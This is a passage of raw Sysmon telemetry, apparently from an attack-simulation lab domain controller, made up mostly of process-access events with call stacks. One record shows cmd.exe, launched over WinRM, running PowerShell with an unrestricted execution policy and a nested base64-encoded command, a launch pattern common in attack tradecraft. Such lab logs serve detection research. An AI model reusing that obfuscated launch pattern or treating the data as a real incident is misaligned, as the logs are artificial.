\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000199Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:24.868{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000198Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:24.868{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000197Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:24.868{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000196Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:24.868{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000195Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:24.868{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000194Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:24.868{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000193Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:24.868{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000192Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:24.868{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000191Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:24.868{5D479F2C-14FE-5F84-0500-000000007E01}640760C:\Windows\system32\csrss.exe{5D479F2C-1678-5F84-0003-000000007E01}4748C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x8000000000000000190Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:24.868{5D479F2C-1678-5F84-FE02-000000007E01}42364224C:\Windows\system32\WinrsHost.exe{5D479F2C-1678-5F84-0003-000000007E01}4748C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\WinrsHost.exe+2c94|C:\Windows\system32\WinrsHost.exe+2eb1|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+7d09|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+b42b|C:\Windows\System32\combase.dll+53b8c|C:\Windows\System32\combase.dll+53842|C:\Windows\System32\combase.dll+51968|C:\Windows\System32\combase.dll+4fedd|C:\Windows\System32\combase.dll+4f5bf|C:\Windows\System32\combase.dll+6da09|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5982e|C:\Windows\System32\RPCRT4.dll+39257|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb 154100x8000000000000000189Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:24.872{5D479F2C-1678-5F84-0003-000000007E01}4748C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=C:\Users\Administrator\ATTACKRANGE\Administrator{5D479F2C-1678-5F84-7C8C-110000000000}0x118c7c0HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{5D479F2C-1678-5F84-FE02-000000007E01}4236C:\Windows\System32\winrshost.exeC:\Windows\system32\WinrsHost.exe -Embedding 10341000x8000000000000000188Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:24.868{5D479F2C-1504-5F84-0B00-000000007E01}8603768C:\Windows\system32\lsass.exe{5D479F2C-1507-5F84-1300-000000007E01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000187Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:24.868{5D479F2C-1504-5F84-0B00-000000007E01}8603768C:\Windows\system32\lsass.exe{5D479F2C-1507-5F84-1300-000000007E01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000186Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:24.868{5D479F2C-1504-5F84-0B00-000000007E01}8603768C:\Windows\system32\lsass.exe{5D479F2C-1507-5F84-1300-000000007E01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000185Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:24.852{5D479F2C-1507-5F84-1300-000000007E01}13082496C:\Windows\system32\svchost.exe{5D479F2C-1678-5F84-FE02-000000007E01}4236C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\winrscmd.dll+8d36|C:\Windows\system32\winrscmd.dll+92d5|C:\Windows\system32\winrscmd.dll+af31|C:\Windows\system32\winrscmd.dll+23dc|c:\windows\system32\wsmsvc.dll+155ac7|c:\windows\system32\wsmsvc.dll+13f76d|c:\windows\system32\wsmsvc.dll+13f3cf|c:\windows\system32\wsmsvc.dll+13fcb2|c:\windows\system32\wsmsvc.dll+9ab10|c:\windows\system32\wsmsvc.dll+9b611|c:\windows\system32\wsmsvc.dll+4495|c:\windows\system32\wsmsvc.dll+16816c|c:\windows\system32\wsmsvc.dll+1689b8|c:\windows\system32\wsmsvc.dll+16345b|c:\windows\system32\wsmsvc.dll+163125|c:\windows\system32\wsmsvc.dll+14ce9c|c:\windows\system32\wsmsvc.dll+130049|c:\windows\system32\wsmsvc.dll+13571a|c:\windows\system32\wsmsvc.dll+12f47e|c:\windows\system32\wsmsvc.dll+125587|c:\windows\system32\wsmsvc.dll+11f562|c:\windows\system32\wsmsvc.dll+124574 10341000x8000000000000000184Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:24.852{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1678-5F84-FE02-000000007E01}4236C:\Windows\system32\WinrsHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000183Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:24.837{5D479F2C-1678-5F84-FF02-000000007E01}47564000C:\Windows\system32\conhost.exe{5D479F2C-1678-5F84-FE02-000000007E01}4236C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000182Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:24.837{5D479F2C-14FE-5F84-0500-000000007E01}6401148C:\Windows\system32\csrss.exe{5D479F2C-1678-5F84-FF02-000000007E01}4756C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x8000000000000000181Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:24.837{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000180Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:24.837{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000179Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:24.837{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000178Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 